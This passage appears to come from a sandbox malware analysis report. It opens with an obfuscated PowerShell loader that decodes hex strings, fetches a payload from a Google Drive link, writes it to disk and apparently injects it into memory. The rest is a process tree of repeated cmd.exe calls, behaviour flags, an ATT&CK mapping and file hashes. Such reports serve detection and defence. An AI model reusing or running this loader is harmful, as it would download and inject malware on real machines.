'016140494C4E440B6140434C4B40664A4B5651575046514A570D016B4A4B555740464C4A501309057E765C565140480B774043494046514C4A4B0B664449494C4B42664A4B53404B514C4A4B56781F1F7651444B4144574109050164554A480C0B7640516C4855494048404B5144514C4A4B63494442560D016B4A4B555740464C4A50120C';&($Demo7) $Topbetjent3;$Topbetjent4 = muliebr11 '016140494C4E440B6140434C4B406840514D4A410D016140484A170905016140484A16090501634A5747575C09050164554A480C0B7640516C4855494048404B5144514C4A4B63494442560D016B4A4B555740464C4A50120C';&($Demo7) $Topbetjent4;$Topbetjent5 = muliebr11 '57405150574B05016140494C4E440B665740445140715C55400D0C';&($Demo7) $Topbetjent5 ;}$Unfel196 = muliebr11 '4E40574B40491617';$Topbetjent6 = muliebr11 '0169415740534449420518057E765C565140480B77504B514C48400B6C4B5140574A55764057534C4640560B684457564D4449781F1F6240516140494042445140634A5763504B46514C4A4B754A4C4B5140570D0D434E550501704B434049141C1305016140484A110C09050D62617105650D7E6C4B517551577809057E706C4B5116177809057E706C4B5116177809057E706C4B511617780C050D7E6C4B51755157780C0C0C';&($Demo7) $Topbetjent6;$Glamo = fkp $Demo5 $Demo6;$Topbetjent7 = muliebr11 '01674C4457465044514047160518050169415740534449420B6C4B534A4E400D7E6C4B51755157781F1F7F40574A09051311150905155D161515150905155D11150C';&($Demo7) $Topbetjent7;$Topbetjent8 = muliebr11 '01765056565049511416150518050169415740534449420B6C4B534A4E400D7E6C4B51755157781F1F7F40574A09051011131D1C121C170905155D161515150905155D110C';&($Demo7) $Topbetjent8;$muliebr01 = 'https://drive.google.com/uc?export=download&id=1-R3r3SEIXJtsxvIGl9F3JR1EiblvLOtW';$muliebr00 = muliebr11 '0161574448440518050D6B4052086A474F404651056B40510B72404766494C404B510C0B614A524B494A44417651574C4B420D014850494C40475715140C';$Topbetjent8 = muliebr11 '01674C4457465044514047171801404B531F44555541445144';&($Demo7) $Topbetjent8;$Biarcuateb2=$Biarcuateb2+'\Telefon.ndt';$Drama='';$Topbetjent8 = muliebr11 '76514457510876494040550510';if (-not(Test-Path $Biarcuateb2)) {while ($Drama -eq '') {&($Demo7) $muliebr00;&($Demo7) $Topbetjent8;}Set-Content $Biarcuateb2 $Drama;}$Drama = Get-Content $Biarcuateb2;$Topbetjent9 = muliebr11 '01714A554740514F404B510518057E765C565140480B664A4B53405751781F1F63574A486744564013117651574C4B420D0161574448440C';&($Demo7) $Topbetjent9;$Drama0 = muliebr11 '7E765C565140480B77504B514C48400B6C4B5140574A55764057534C4640560B684457564D4449781F1F664A555C0D01714A554740514F404B5109051509050501674C44574650445140471609051311150C';&($Demo7) $Drama0;$Funder=$Topbetjent.count-640;$Drama1 = muliebr11 '7E765C565140480B77504B514C48400B6C4B5140574A55764057534C4640560B684457564D4449781F1F664A555C0D01714A554740514F404B5109051311150905017650565650495114161509050163504B4140570C';&($Demo7) $Drama1;$Drama2 = muliebr11 '016D44574A5640514D410518057E765C565140480B77504B514C48400B6C4B5140574A55764057534C4640560B684457564D4449781F1F6240516140494042445140634A5763504B46514C4A4B754A4C4B5140570D0D434E550501765144530501634A574B44424940410C09050D62617105650D7E6C4B517551577809057E6C4B517551577809057E6C4B517551577809057E6C4B517551577809057E6C4B51755157780C050D7E6C4B51755157780C0C0C';&($Demo7) $Drama2;$Drama3 = muliebr11 '016D44574A5640514D410B6C4B534A4E400D01674C4457465044514047160901765056565049511416150901624944484A091509150C';&($Demo7) $Drama3#"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:832

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1240

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1912

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1784

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo 16 && exit"
4⤵
PID:1616

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6RHWTK4TGU3YXPENJ308.temp
Filesize
7KB

MD5
0b65384915da9a35e522e995c6f2af9b

SHA1
cbe79c15ab477430e40dc2b1a519c5b0bcfd69a3

SHA256
830f691633565f2156bb0e34ff29fdc934e8ff50a3cd9354548c09f51aed39b2

SHA512
d2290f49a049b818558ccb70e7a852b7e2127099a63d5eaa4a25fe33b1d926049f36e4476c673332a52c07ee7b07b279fdf8522f36acba659bbd7c7b634df31c

Download Submit
memory/748-65-0x0000000001E40000-0x0000000001E80000-memory.dmp

Filesize
256KB

Download
memory/748-75-0x0000000001E40000-0x0000000001E80000-memory.dmp

Filesize
256KB

Download
memory/748-74-0x0000000001E40000-0x0000000001E80000-memory.dmp

Filesize
256KB

Download
memory/748-67-0x0000000001E40000-0x0000000001E80000-memory.dmp

Filesize
256KB

Download
memory/748-66-0x0000000001E40000-0x0000000001E80000-memory.dmp

Filesize
256KB

Download
memory/1716-61-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1716-62-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1716-58-0x000000001B340000-0x000000001B622000-memory.dmp

Filesize
2.9MB

Download
memory/1716-70-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1716-71-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1716-72-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1716-73-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1716-60-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1716-59-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing